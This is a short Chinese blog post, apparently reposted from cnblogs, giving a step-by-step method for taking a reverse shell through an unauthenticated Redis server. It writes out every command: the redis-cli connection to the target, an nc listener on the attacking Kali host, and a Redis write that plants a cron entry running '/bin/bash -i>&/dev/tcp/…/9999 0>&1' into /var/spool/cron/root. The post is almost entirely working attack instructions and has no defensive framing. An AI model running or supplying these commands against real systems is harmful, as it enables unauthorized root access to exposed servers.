标签:dir redis未授权 div redis 写入 shell ima 技术分享 成功
Redis未授权访问反弹shell
目标主机:10.104.11.178
攻击机:kali
攻击步骤:
1.与目标主机连接
root@kali:~# /usr/redis/redis-cli -h 10.104.11.178
2.kali主机进行监听
nc -l -v -p 9999
3.写入反弹shell语句
set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/10.104.11.153/9999 0>&1\n\n" config set dir /var/spool/cron config set dbfilename root save
4.反弹shell连接成功
标签:dir redis未授权 div redis 写入 shell ima 技术分享 成功
原文地址:https://www.cnblogs.com/someone9/p/8986502.html